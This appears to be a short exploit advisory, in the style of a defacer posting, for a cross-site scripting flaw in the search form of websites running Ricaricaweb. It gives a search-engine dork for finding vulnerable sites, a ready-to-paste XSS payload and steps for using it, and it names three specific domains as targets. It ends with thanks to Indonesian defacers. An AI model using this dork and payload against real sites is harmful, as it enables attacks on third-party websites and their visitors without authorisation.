################################################################################################ Title : Powered By Ricaricaweb Cross Site Scripting Vulnerabiliry (Form Search) Dork : intext"Powered By Ricaricaweb" | inurl:/login Exploit: /search Payload: "><img src=x onerror=alert('XSS Attack')> Poof: you must input the payload on form search and you can get XSS Vulnerability Vendor: www.anm.co.id/login www.kitomaindonesia.com/login www.xrayindonesia.com/login ================================================================ Special Thanks to: ALL INDONESIAN DEFACER ##############################################################################################